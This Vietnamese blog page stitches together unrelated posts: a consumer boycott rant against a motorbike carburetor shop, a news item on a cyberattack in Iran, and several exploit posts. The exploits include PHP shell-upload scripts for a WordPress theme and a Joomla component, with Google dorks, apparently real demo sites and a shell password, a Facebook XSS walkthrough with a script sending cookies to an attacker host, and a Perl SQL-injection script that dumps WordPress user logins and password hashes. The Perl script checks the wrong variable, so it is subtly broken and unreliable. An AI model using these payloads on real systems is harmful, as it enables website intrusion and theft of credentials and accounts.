Hacking - Buzz­™ Blog IT

Hacking - Buzz™ * Cảm Ơn Các Bạn Đã Ghé Thăm Website *

hãy tẩy chay thành đạt bình xăng con ép người mua



Đây là những lời comment đừng bao giờ đến thành đạt bình xăng con

đọc và hãy tẩy chay tẩy chay thành đạt dỏm
ĐÂY LÀ NHỮNG LỜI PHÊ BÌNH TẨY CHAY THÀNH ĐẠT BÌNH XĂNG CON
ĐỒ LỪA ĐẢO LUÔN LUÔN BẮT ÉP NGƯỜI TA MUA BÌNH XĂNG KHÔNG BÁN PHỤ TÙNG
KHông gì buồn bằng buồn cơ sở bình xăng con Thành Đạt, số 235-Nguyễn Tri Phương, P5, Q.10.
Chuyện là chiều nay tôi có ghé công ty sx Bình xăng con Thành Đạt gắn dùm 1 cái lò xò của ốc chỉnh gió bình xăng con (do trong lúc tôi tháo để vệ sinh, vô tình làm thất lạc 1 cái lò xo nói trên), như 1 trong 4 chị ngồi bàn nhận hàng và tính tiền nói 1 câu xanh dờn " không có lò xo em ơi, thay cả bình xăng luôn đi", trong khi đó bình xăng của tôi còn nguyên, bình zin của drem Thái, chưa một lần phục hồi hay sửa chữa, đúng là công ty TNHH sx TM DV cơ khí Thành Đạt dạo này đáng sợ thật".
Mong các anh chỉ giúp dùm nơi nào có thể giúp tôi được.
Cám ơn.
Sau này, Công ty sx Bình xăng con Thành Đạt "thua rồi".
Tôi bị 1 lần, bình xăng con Spacy của tôi "bị" thay cây kim, đi được đúng 2 ngày, mất garanty, bực mình quá để ở nhà luôn, sau khoảng 2 tháng thì đem đến Thành Đạt+giấy bảo hành, bị quốc thêm 135.000đ, mà không nói lý do, nhưng nhìn trên giấy dđợt trước ghi là "XK Spacy", có thể "XK"là xoáy kim.
Bình xăng con Thành Đạt (tức CENTA) dạo này mất uy tìn lắm rồi, các bạn để ý thử xem.
Ối, Bình xăng Thành Đạt sau này kinh tởm lắm, chưa đâu các bạn, Thành Đạt còn chỉ qua tiệm "Mận Thành Đạt" (trên đường Nguyễn Chí Thanh, Q.5- gần bình xăng Thành Đạt) chuyên làm bố nồi nữa kìa, coi chừng bị "luộc" nồi xịn nhé.
Thật kinh tởm, tôi bị rồi (Spacy 125 Nhật sx) , thật đau lòng.
Trời, tưởng ở đâu ?
Bình xăng con Thành Đạt+Bố nồi Mận Thành Đạt là 2 nơi giết người không tởm.
Bình xăng CENTA (Thành Đạt) quận 5, đã bê bối từ lâu rồi, bây giờ các chiến hữu mới biết hả ???
bọn này bê bối lâu rồi, xe em lúc trước không để garranty được, đem qua Thành Đạt bảo nó xem giùm BXC, nó nổ máy rồi phán câu xanh rờn: đem qua bên kia đường làm máy đi (nồi + đầu nòng luôn). cũng nhờ em là em họ Quách Tỉnh nên éo nghe lời nó, về mua BXC zin > 1 triệu về garranty đều nhuyễn, máy im lịm đi đến giờ đã 3 năm rồi éo sao cả. Nghe lời nó chắc banh xe em rồi.
Tiệm bình xăng con Thành Đạt + Làm Bố Nồi "Mận Thành Đạt" là 2 anh em kết nghĩa, nên cả 2 tiệm đều "THỐI".
Sáng nay tôi mới ghé đến hỏi mua con ốc chỉnh xăng, họ nói là không có bán phục tùng, anh mua cả 1 cái BXC đi, chỉnh cho xe anh đi tốt !!!
Thành Đạt (CENTA) dạo này "Kinh Tởm" thật.
Phải "Tẩy chay" thôi.
tiêu chí hùi xưa của THÀNH ĐẠT : "NGON_BỔ_RẺ"
bây giờ kinh tế thị trường thành : "NGON_BỔ_NGỬA"
BXC giờ trên Phố mình bán đầy đó. Toàn đồ Nhật, Thái SX. Trước đây hàng hóa hiếm nên phải sài của cái Ông Thành Đạt (Centa). Thời điểm cách đây khoảng 20 năm về trước thì Ông Thành Đạt là 1 ông trùm trong làng BXC. Chứ giờ vào Phố mua cg có mà vào Head mua cg chẳng thiếu. Đi tới cái Ông Thành Đạt làm gì cho thêm tức mà lại mua phải cái thứ đồ ơ kìa........
Hôm qua em mới vô THÀNH ĐẠT CHÓ thay cái chén xăng, mua cái chén xong đem cho thợ thay (thợ ở đó), em ngồi coi thì thấy thằng thợ lấy lại cái ron, em nghĩ, chắc ron mình còn xài ok nên cũng ko nói gì, thay xong hỏi nó tiền công (em ko biết là mua phụ tùng bao luôn công), nó nói cho tiền cafe nhìu cũng được. Lúc đó em chưa chạy về ngay mà đi công việc xí, đi 1 hồi thấy vẫn bị rỉ xăng (do ron cũ bị chai), em quay lại ngay và luôn bắt nó gắn cái ron cho em.
Bà mịa nó có cái ron cũng "ém" lại, tức thiệt là tức


theo sưu tầm THÀNH ĐẠT CHÓ KHỐN NẠN TỪ
http://phoxe.phomuaban.vn/index.php?mod=detail&id=588919&cat=&p=1&d=

Xem Thêm

 

Iran phá vụ tấn công mạng nhằm vào cơ sở hạ tầng

Hãng thông tấn ISNA dẫn lời Ali Akbar Akhavan, quan chức phòng vệ dân sự Iran, ngày 25/12 cho biết Tehran vừa đập tan một âm mưu mới nhằm vào các cơ sở công nghiệp của nước này ở tỉnh miền Nam Hormuzgan, đồng thời cáo buộc "các kẻ thù" vẫn không ngừng tấn công vào cơ sở hạ tầng của Iran.



Akhavan cho hay: "Một loại virus đã thâm nhập một số ngành công nghiệp sản xuất ở tỉnh Hormuzgan song quá trình này đã bị ngăn chặn nhờ sự hợp tác của các tin tặc lão luyện."

Ông tiết lộ phần mềm độc hại này giống như virus Stuxnet song không cho biết thêm chi tiết mà chỉ cho hay vụ tấn công này đã xảy ra "chỉ vài tháng trước."

Ông Akhavan khẳng định một trong những mục tiêu của âm mưu này là Công ty Bandar Abbas Tavanir, là đơn vị giám sát việc sản xuất và phân phối điện ở tỉnh Hormuzgan và các tỉnh lân cận.

Trong khi đó, hãng tin bán chính thức Fars đưa tin cũng trong ngày 25/12, Iran đã dập tan một "vụ tấn công mạng có xuất xứ từ thành phố Dallas của Mỹ nhằm vào một trong những cơ sở của Bộ Văn hóa nước này" song hãng này không cho biết thêm chi tiết.

Theo Vietnam+

Xem Thêm

 

Wordpress Themes - yvora Arbitrary File Upload Vulnerability

-------------------------------------------------------------------------------
Wordpress Themes- yvora Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/yvora"
#
#######################################################################################


Exploit  : uploadshell.php.jpg or .gif



Quote
<?php

$uploadfile="dz.php.jpg";

$ch = curl_init("http://www.localhost...y/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.localhost...stom_dz.php.jpg

Quote

<?php
phpinfo();
?>
---------------------------------------------------------------------------------------

Demo :

1) http://askyvi.com/wp...y/uploadify.php

2) http://epeknights.co...y/uploadify.php

3) http://www.ben2bath....y/uploadify.php

-----------------------------------------------------------------------------------------

Xem Thêm

 

Joomla Component com_jsmusic shell upload Vulnerability

#################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"com_jsmusic"
#
##################################################################################

Exploit : uploadshell.php



Quote
<?php

$uploadfile="dz.php";

$ch = curl_init("http://localhost/com...com_jsmusic/js/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://localhost/com...music/js/dz.php


Quote
<?php
phpinfo();
?>

##################################################################################
#
# Demo : http://www.bsbmusica...y/uploadify.php
#
# Shell: http://www.bsbmusica...smusic/js/x.php
# _____________________
# Shell password => dz0
# _____________________
##################################################################################

Xem Thêm

 

Khai thác lỗ hổng XSS/CSS trên Facebook

Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất.

Thông thường, hầu hết kiểu khai thác Cross-Site Scripting đều liên quan đến việc gửi cookie của nạn nhân tới máy của kẻ tấn công thông qua Javascript.



<script>
document.write("<img src='http://attackersite/a.gif?x=" + escape(document.cookie + "'>")
</script>
Trong khi khai thác lỗ hổng Cross-Site Scripting, kẻ tấn công sẽ không dựa vào cookie mà chúng đánh cắp được, mà attacker có thể tiêm code Javascript vào website của nạn nhân. Attacker cũng có thể thực hiện các hành động nguy hiểm khác.

xssattack

Trong trường hợp đối với Fb, quá trình được diễn ra như sau:

1. Đọc messages cá nhân của nạn nhân.
2. Lấy và chỉnh sửa ảnh cá nhân của nạn nhân.
3. Gửi thông điệp tới những contacts của nạn nhân.
4. Thêm những ứng dụng Facebook mới.
5. Đánh cắp contacts.

Mô tả chi tiết khai thác lỗ hổng Cross-Site Scripting trên Fb.

Facebook sử dụng PHP scripts. Scripts này đã bị khai thác từ tháng 7/2010. http://www.facebook....ve_uploader.php

Script chứa những thông số khác nhau, một trong số chúng - controller_id: đầu vào trực tiếp bên trong của một thẻ script của người dùng. Vd: http://www.facebook....0&post_upload=1

HTML body mà chúng ta cần quan tâm:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script> 
 
Bạn sẽ nhận thấy rằng giá trị controller_id (c4c288b438ed080) được viết trực tiếp bên trong đoạn Javascript của trang HTML. Bằng cách chèn double quote, attacker có khả năng thoát khỏi chuỗi key của array và chèn  Javascript trực tiếp bên trong một trang facebook.com, thay đổi thông số controller_id dễ dàng:

controller_id=test”]}; alert(“facebook test”); //

Điều này làm thay đổi nội dung sau:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["test"]}; alert("facebook test"); //"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nội dung này sẽ chạy alert box:


facebook_xss

Ở giai đoạn này attacker cần phải làm là đọc nội dung JSON giống như client-side scripts của Fb.

Cách thức khai thác lỗ hổng XSS để chiếm tài khoản Fb

Để đạt được mục đích này, attacker có thể gọi file mở rộng .js trên Web Server của anh ta để add thêm nhiều code.  Số frameworks giúp chuyên gia bảo mật hoặc attacker khai thác lỗ hổng CSS, giống như BeEF.

Trong TH này, chúng ta sẽ tùy biến code để chỉ định những tính năng nào được hiển thị.

Javascript code hướng dẫn web browser của nạn nhân đọc danh sách private messages tìm thấy trên http://www.facebook..../home/inbox.php. Code phân tích từng ID message. Với mỗi message, Javascript code của attacker sẽ đọc được message http://www.facebook..../ReadThread.php.

Cuối cùng, attacker có thể nhận được nội dung message trực tiếp từ máy chủ web server của anh ta.

Trong đoạn video dưới đây, chúng ta sẽ thấy cách thức attacker gửi nội dung nhạy cảm của victim thông qua Facebook chat.



Tham khảo thêm tại:

[1] - http://www.acunetix....e-scripting.htm
[i][2] - http://www.acunetix....ss-facebook.htm


Nguồn: Bảo Mật Hệ Thống.

Xem Thêm

 

WordPress - PICA Photo Gallery Automatic SQL Injection (perl)

# Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl)
# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne


#!/usr/bin/perl  
use LWP::UserAgent;
system("clear");
print "***********************************************\n";
print "* WordPress - PICA Photo Gallery SQLi exploit *\n";
print "*                 Created by D35m0nd142                     *\n";
print "***********************************************\n\n";
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$table_name="wp_users";
$agent = LWP::UserAgent->new() or die "Error!\n";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
$host = $target . "/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users-";
$request = $agent->request(HTTP::Request->new(GET=>$host));
$result = $request->content;
if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}

Xem Thêm